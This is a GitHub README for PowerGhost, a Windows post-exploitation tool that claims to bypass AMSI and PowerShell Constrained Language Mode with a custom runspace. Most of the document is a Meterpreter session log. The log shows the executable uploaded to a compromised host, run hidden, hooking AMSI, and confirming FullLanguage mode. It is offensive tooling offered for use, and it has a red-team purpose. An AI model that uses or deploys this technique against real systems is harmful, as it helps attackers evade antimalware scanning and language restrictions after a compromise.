plackyhacker/PowerGhost
GitHub: plackyhacker/PowerGhost
A Windows post-exploitation tool that bypasses AMSI and Constrained Language Mode by creating a custom PowerShell runspace.
Stars: 21 | Forks: 13
# PowerGhost
A custom runspace to bypass AMSI and Constrained Language Mode in PowerShell.
## Example Running in Meterpreter
```
meterpreter > upload PowerGhost64.exe
[*] uploading : PowerGhost64.exe -> PowerGhost64.exe
[*] Uploaded 6.00 KiB of 6.00 KiB (100.0%): PowerGhost64.exe -> PowerGhost64.exe
[*] uploaded : PowerGhost64.exe -> PowerGhost64.exe
meterpreter > execute -H -i -f "PowerGhost64.exe"
Process 5276 created.
Channel 8 created.
PowerGhost by PlackyHacker
--------------------------
Type 'exit' to close.
[+] Hooking AMSI for bypass...
PG C:\Users\Placky> $ExecutionContext.SessionState.LanguageMode
FullLanguage
PG C:\Users\Placky>
```